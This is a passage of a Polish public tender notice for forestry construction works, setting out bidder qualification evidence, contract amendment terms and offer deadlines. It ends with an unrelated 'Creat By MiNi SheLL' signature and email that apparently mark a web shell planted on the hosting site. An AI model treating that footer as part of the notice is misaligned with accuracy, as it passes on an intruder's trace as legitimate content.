podmioty te wykonają roboty budowlane lub usługi, do realizacji których te<br/>zdolności są wymagane.<br/>7.6. Wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby, musi<br/>udowodnić Zamawiającemu, że realizując zamówienie, faktycznie będzie dysponował zasobami tych podmiotów, w szczególności przedstawiając ich zobowiązanie do oddania mu do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji zamówienia.<br/>7.7. Zamawiający oceni, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby<br/>zdolności techniczne lub zawodowe pozwalają na wykazanie przez Wykonawcę spełniania<br/>warunków udziału w postępowaniu dotyczących zdolności technicznych lub zawodowych, a<br/>także zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały<br/>przewidziane względem Wykonawcy.<br/>7.8. Jeżeli zdolności techniczne lub zawodowe podmiotu udostępniającego zasoby nie<br/>potwierdzają spełniania przez Wykonawcę warunków udziału w postępowaniu lub zachodzą<br/>wobec tego podmiotu podstawy wykluczenia, Zamawiający żąda, aby Wykonawca w terminie<br/>określonym przez Zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo<br/>wykazał, że samodzielnie spełnia warunki udziału w postępowaniu. Wykonawca nie może, po<br/>upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów<br/>udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na<br/>zdolnościach lub sytuacji podmiotów udostępniających zasoby.<br/>7.9. Żaden z wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może<br/>podlegać wykluczeniu z postępowania.<br/>7.10. Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą<br/>„spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach lub oświadczeniach<br/>złożonych przez Wykonawców. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">„Oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków<br/>udziału w postępowaniu”, w zakresie wskazanym przez Zamawiającego odpowiednio w pkt 6.1 i 6.2<br/>oraz w pkt 7.1 SWZ. Oświadczenie to stanowić będzie dowód, potwierdzający brak podstaw<br/>wykluczenia lub spełnianie warunków udziału w postępowaniu na dzień składania ofert, tymczasowo<br/>zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe (wzór oświadczenia<br/>stanowi załącznik nr 4 do SWZ).<br/>-Podmiotowe środki dowodowe, które na wezwanie Zamawiającego zobowiązany będzie złożyć<br/>Wykonawca, którego oferta zostanie najwyżej oceniona, w wyznaczonym terminie, nie krótszym niż 5<br/>dni od dnia wezwania, aktualne na dzień ich złożenia.<br/>W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących<br/>zdolności technicznej lub zawodowej, Zamawiający żąda:<br/>a) wykaz robót budowlanych porównywalnych z robotami stanowiącymi przedmiot zamówienia, w<br/>przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 5 lat od<br/>dnia w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie, wraz z podaniem ich wartości brutto, przedmiotu (rodzaju wykonanych usług), dat<br/>wykonania (dat dziennych rozpoczęcia i zakończenia realizacji) i podmiotów, na rzecz których usługi<br/>zostały wykonane (wzór wykazu wykonanych usług stanowi załącznik nr 8 do SWZ),<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonanych<br/>wspólnie z innymi wykonawcami informacje, o których mowa wyżej dotyczą robót budowlanych<br/>faktycznie przez niego wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych -<br/>również faktycznie przez niego wykonywanych.<br/>b) dowody, że wskazane przez Wykonawcę usługi na potwierdzenie spełnienia warunku udziału w<br/>postępowaniu dot. zdolności technicznej lub zawodowej w zakresie doświadczenia zostały wykonane<br/>lub są wykonywane należycie,<br/>Dowodami, o których mowa powyżej są referencje bądź inne dokumenty sporządzone przez podmiot,<br/>na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o<br/>obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie<br/>Wykonawcy.<br/>c) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich uprawnień i doświadczenia (jeżeli są wymagane) niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami (wzór wykazu osób skierowanych przez wykonawcę do<br/>realizacji zamówienia stanowi załącznik nr 10 do SWZ).<br/>Uwaga! Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych lub usług<br/>wykonywanych wspólnie z innymi Wykonawcami, wykaz o którym mowa w lit. a), dotyczy robót<br/>budowlanych, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">informację z Krajowego Rejestru Karnego w zakresie:(a) art. 108 ust. 1 pkt 1 i 2 PZP, (b) art. 108 ust. 1<br/>pkt 4 PZP, odnośnie do orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>karnego, wystawioną nie wcześniej niż 6 miesięcy przed jej złożeniem,<br/>b) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej<br/>grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów<br/>(tekst jedn. Dz. U. z 2021 r. poz. 275 z późn. zm.), z innym Wykonawcą, który złożył odrębną ofertę<br/>albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego<br/>Wykonawcy należącego do tej samej grupy kapitałowej - (wzór oświadczenia Wykonawcy w zakresie<br/>art. 108 ust. 1 pkt 5 PZP o przynależności lub braku przynależności do tej samej grupy kapitałowej<br/>stanowi załącznik nr 7 do SWZ),<br/>c) oświadczenia Wykonawcy o aktualności informacji zawartych w Oświadczeniu<br/>o niepodleganiu wykluczeniu i spełniania warunków udziału w postępowaniu, w zakresie podstaw<br/>wykluczenia z postępowania, o których mowa w:<br/>- art. 108 ust. 1 pkt 3 ustawy,<br/>- art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne<br/>tytułem środka zapobiegawczego,<br/>- art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na<br/>celu zakłócenie konkurencji,<br/>- art. 108 ust. 1 pkt 6 ustawy,<br/>- art. 109 ust. 1 pkt 4 ustawy.<br/>(wzór oświadczenia stanowi załącznik nr 9 do SWZ).<br/>9.6. Podmiotowe środki dowodowe, które będzie zobowiązany złożyć Wykonawca, którego oferta<br/>zostanie najwyżej oceniona, który ma siedzibę lub miejsce zamieszkania poza granicami<br/>Rzeczypospolitej Polskiej. Wykonawca zagraniczny zamiast:<br/>a) informacji z Krajowego Rejestru Karnego, o której mowa w pkt 9.5. lit. a) – składa informację z<br/>odpowiedniego rejestru, takiego jak rejestr sądowy, albo, w przypadku braku takiego rejestru, inny<br/>równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym<br/>wykonawca ma siedzibę lub miejsce zamieszkania, w zakresie, o którym mowa w pkt 6.1<br/>b) jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje siędokumentów, o których mowa w lit. a) lub gdy dokumenty te nie odnoszą się do wszystkich<br/>przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4,<br/>ustawy PZP, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym<br/>odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego<br/>reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub,<br/>jeżeli w kraju, w którym Wykonawca ma siedziby lub miejsce zamieszkania nie ma przepisów o<br/>oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem,<br/>organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce<br/>zamieszkania Wykonawcy.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek dołączyć do<br/>oferty „Oświadczenie, które roboty budowlane, dostawy lub usługi wykonają poszczególni<br/>Wykonawcy”– jeżeli w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji<br/>zawodowych lub doświadczenia polegają na zdolnościach tych z Wykonawców, którzy wykonają<br/>roboty budowlane lub usługi, do realizacji których te zdolności są wymagane (wzór oświadczenia<br/>stanowi załącznik nr 5 do SWZ).<br/>2) Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>ma obowiązek złożyć wraz z ofertą, „Zobowiązanie podmiotu udostępniającego zasoby do<br/>oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia” lub<br/>inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie,<br/>będzie dysponował niezbędnymi zasobami tych podmiotów – jeżeli w odniesieniu do warunków<br/>dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia polegają na<br/>zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane<br/>lub usługi, do realizacji których te zdolności są wymagane (wzór zobowiązania stanowi załącznik<br/>nr 6 do SWZ).<br/>Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa wyżej, powinno potwierdzać,<br/>że stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje<br/>rzeczywisty dostęp do tych zasobów oraz określać w szczególności:<br/>a) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub<br/>usługi, których wskazane zdolności dotyczą.<br/>Treść zobowiązania powinna bezspornie i jednoznacznie wskazywać na zakres zobowiązania<br/>innego podmiotu, określać, czego dotyczy zobowiązanie oraz w jaki sposób i w jakim okresie<br/>będzie ono wykonywane.<br/>9.3. Inne dokumenty i oświadczenia składane wraz z ofertą.<br/>1) W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego<br/>reprezentowania, Wykonawcy ma obowiązek złożyć odpis lub informację z Krajowego Rejestru<br/>Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego<br/>rejestru. Wykonawca nie jest zobowiązany do złożenia powyższych dokumentów, jeżeli<br/>Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile<br/>Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>2) Jeżeli w imieniu Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, podmiotu udostępniającego zasoby lub podwykonawcy niebędącego podmiotem<br/>udostępniającym zasoby, działa osoba, której umocowanie do jego reprezentowania nie wynika<br/>z powyższych dokumentów, należy złożyć pełnomocnictwo lub inny dokument potwierdzający<br/>umocowanie do reprezentowania<br/>Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego,<br/>podmiotu udostępniającego zasoby lub podwykonawcy niebędącego podmiotem<br/>udostępniającym zasoby.<br/>Pełnomocnictwo powinno być złożone w oryginale lub w postaci cyfrowego odwzorowania<br/>dokumentu sporządzonego w postaci papierowej (elektronicznej kopii), poświadczonej za<br/>zgodność z oryginałem przez mocodawcę albo notarialnie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron, wyrażoną na piśmie<br/>pod rygorem nieważności oraz musi być zgodna z przepisami Prawa zamówień publicznych.<br/>2. Strony przewidują możliwość wprowadzenia zmian w zawartej umowie co do terminu<br/>wykonania przedmiotu umowy, wskazanego w zapisie § 2 ust. 1, w następujących przypadkach:<br/>a) opisanym w zapisie § 13 ust. 10 i 11, na warunkach tamże wskazanych,<br/>b) potrzeby wykonania robót dodatkowych na podstawie protokołu konieczności podpisanego<br/>przez inspektora nadzoru inwestorskiego i zatwierdzonego przez Zamawiającego, o czym mowa<br/>w zapisie § 1 ust. 5 – wydłużenie terminu wykonania przedmiotu umowy o okres, w którym<br/>wykonywane będą roboty dodatkowe, niezbędne do prawidłowego wykonania przedmiotu<br/>umowy.<br/>3. Strony przewidują możliwość zmiany zapisu § 5 ust. 2 po przedstawieniu uprawnień<br/>budowlanych kandydata na nowego kierownika budowy oraz oświadczenia o podjęciu<br/>obowiązków.<br/>4. Strony przewidują możliwość wprowadzenia zmian w zawartej umowie w zakresie<br/>powierzenia wykonania robót dodatkowych, o których mowa w zapisie § 1 ust. 5, jeżeli będą one<br/>niezbędne do prawidłowego wykonania przedmiotu umowy i jeżeli zostaną spełnione łącznie<br/>warunki, o których mowa w przepisie art. 455 ust. 1 pkt 4) i ust. 2 Prawa zamówień publicznych.<br/>W przypadku, gdy z wprowadzeniem zmian w zawartej umowie w zakresie powierzenia<br/>wykonania robót dodatkowych, będzie się wiązać zmiana terminu wykonania przedmiotu<br/>umowy, zostanie ona dokonana zgodnie z zapisem § 16 ust. 2 pkt b umowy. Wynagrodzenie za<br/>roboty dodatkowe zostanie ustalone w aneksie do umowy zgodnie z zapisem § 8 ust. 3.<br/>5. Strony przewidują możliwość wprowadzenia zmian w zawartej umowie w przypadku zawarcia<br/>Umowy z wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia w zakresie zmiany<br/>członka konsorcjum upoważnionego do wystawiania faktur i do odbioru wynagrodzenia w imieniu<br/>wszystkich członków konsorcjum.<br/>6. Strony przewidują możliwość wprowadzenia zmian w zawartej umowie na podstawie przepisu<br/>art. 455 ust. 1 pkt 2) Prawa zamówień publicznych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/lasy_lidzbark</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-18 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-16</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com